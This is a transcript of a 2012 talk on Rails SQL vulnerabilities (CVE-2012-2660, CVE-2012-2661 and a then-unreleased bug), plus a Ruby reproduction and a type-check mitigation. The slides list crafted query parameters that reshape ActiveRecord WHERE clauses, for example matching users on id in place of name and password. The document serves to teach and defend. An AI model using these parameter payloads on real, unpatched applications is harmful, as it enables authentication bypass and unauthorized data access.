"Recent Rails SQL Issues" - 2012
Justin Collins
April 23, 2015
Transcript
Rails Vulnerabilities Last Week
CVE-2012-2660
CVE-2012-2661

CVE-2012-2660
Allows unexpected "IS NULL" in queries
Affects Rails 2.x and 3.x

ActiveRecord query:
  unless params[:name].nil?
    @user = User.where(:name => params[:name])
  end

Query parameters:
  ?name[]
  {"name"=>[nil]}

ActiveRecord query after substitution (the nil check passes because the value is an Array containing nil, not nil itself):
  unless [nil].nil?
    @user = User.where(:name => [nil])
  end

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."name" IS NULL

CVE-2012-2661
Allows some manipulation of the WHERE clause via "dotted" query keys
Affects Rails 3.x

ActiveRecord query:
  User.where(:name => params[:name])

ActiveRecord also accepts dotted "table.column" keys in hash conditions:
  User.where("users.name" => params[:name])

Query parameters:
  ?name[users.id]=1
  {"name"=>{"users.id"=>"1"}}

ActiveRecord query after substitution:
  User.where(:name => {"users.id" => "1"})

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."id" = 1

Unreleased Vulnerability
Allows some manipulation of the WHERE clause via nested hashes in query values
Affects Rails 2.3.x and 3.x

ActiveRecord query:
  User.where(:name => params[:name], :password => params[:password])

Query parameters:
  ?name[users][id]=1&password[users][id]=1
  {"name"=>{"users"=>{"id"=>"1"}}, "password"=>{"users"=>{"id"=>"1"}}}

ActiveRecord query after substitution:
  User.where(:name => {"users"=>{"id"=>"1"}}, :password => {"users"=>{"id"=>"1"}})

Resulting SQL:
  SELECT "users".* FROM "users" WHERE "users"."id" = 1 AND "users"."id" = 1
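All three slides share one root cause: Rack parses `[]`, `[key]` and dotted keys in a query string into Arrays and nested Hashes, and the pre-fix hash-condition builder in ActiveRecord interpreted those types structurally (nil as IS NULL, a Hash as another table's conditions, a dotted key as table.column) instead of as the scalar the developer expected. The Ruby below is an added example, not code from this deck or from Rails: it reimplements a simplified nested-query parser and a stand-in for the pre-fix builder so the three cases above can be reproduced offline, then shows the caller-side type check that rejects anything that is not a plain String. The function names (`parse_nested_query`, `where_sql_vulnerable`, `where_sql_checked`) and the query strings are constructed for the example; the builder quotes values as string literals, whereas Arel casts them to the column type (hence `1` rather than `'1'` on the slides).

```ruby
require 'cgi'

# --- 1. Query-string parsing (simplified model of Rack's nested-query parser) ---

# Turn "name[users][id]=1&password[users][id]=1" into nested Hash/Array values.
# A key with no "=" (as in "?name[]") yields a nil value, which is what produces
# {"name"=>[nil]} in the CVE-2012-2660 case.
def parse_nested_query(query_string)
  params = {}
  query_string.split('&').each do |pair|
    next if pair.empty?
    raw_key, raw_value = pair.split('=', 2)
    key = CGI.unescape(raw_key)
    value = raw_value && CGI.unescape(raw_value)
    base = key[/\A[^\[]+/]                      # "name" from "name[users][id]"
    subkeys = key.scan(/\[([^\]]*)\]/).flatten   # ["users", "id"]; "[]" gives [""]
    assign_nested(params, base, subkeys, value)
  end
  params
end

def assign_nested(container, key, subkeys, value)
  if subkeys.empty?
    container[key] = value
  elsif subkeys.first.empty?                   # trailing "[]" => array element
    (container[key] ||= []) << value
  else
    child = (container[key] ||= {})            # "[sub]" => nested hash
    assign_nested(child, subkeys.first, subkeys.drop(1), value)
  end
end

# --- 2. Stand-in for the pre-fix hash-condition builder (not Rails' real code) ---

def qi(name)
  "\"#{name}\""                                 # identifier quoting as on the slides
end

def qv(value)
  "'#{value.to_s.gsub("'", "''")}'"             # string-literal quoting (Arel would cast)
end

# Expand a conditions hash into predicates following the rules the slides show:
#   Hash value     -> the key is taken as a table name and we recurse (nested hashes)
#   "table.column" -> the key is split on the first "."               (CVE-2012-2661)
#   nil / [nil]    -> IS NULL                                          (CVE-2012-2660)
#   Array          -> IN (...)
#   anything else  -> = value
def expand_conditions(table, conditions)
  conditions.flat_map do |key, value|
    key = key.to_s
    if value.is_a?(Hash)
      expand_conditions(key, value)
    else
      tbl, col = key.include?('.') ? key.split('.', 2) : [table, key]
      attr = "#{qi(tbl)}.#{qi(col)}"
      case value
      when nil then "#{attr} IS NULL"
      when Array
        vals = value.compact
        if vals.empty? then "#{attr} IS NULL"
        elsif vals.size < value.size then "(#{attr} IN (#{vals.map { |v| qv(v) }.join(', ')}) OR #{attr} IS NULL)"
        else "#{attr} IN (#{vals.map { |v| qv(v) }.join(', ')})"
        end
      else "#{attr} = #{qv(value)}"
      end
    end
  end
end

def where_sql_vulnerable(table, conditions)
  "SELECT #{qi(table)}.* FROM #{qi(table)} WHERE #{expand_conditions(table, conditions).join(' AND ')}"
end

# --- 3. The caller-side check: only plain Strings may reach the builder ---------
def where_sql_checked(table, conditions)
  conditions.each do |key, value|
    raise ArgumentError, "#{key}: expected a String, got #{value.inspect}" unless value.is_a?(String)
  end
  where_sql_vulnerable(table, conditions)
end

if __FILE__ == $0
  # Constructed query strings reproducing the three slides.
  ['name[]', 'name[users.id]=1', 'name[users][id]=1&password[users][id]=1'].each do |qs|
    params = parse_nested_query(qs)
    puts "?#{qs}  =>  #{params.inspect}"
    puts "  vulnerable: #{where_sql_vulnerable('users', params)}"
    begin
      where_sql_checked('users', params)
    rescue ArgumentError => e
      puts "  checked:    rejected (#{e.message})"
    end
  end
end
```

The type check is the practitioner's half of the fix: the June 2012 Rails releases changed the builder, but a controller that passes `params[:x]` straight into `where` still relies on the framework to refuse structured input, so verifying `is_a?(String)` (or casting with `to_s` where that is acceptable) at the boundary keeps the query shape under the developer's control regardless of the framework version.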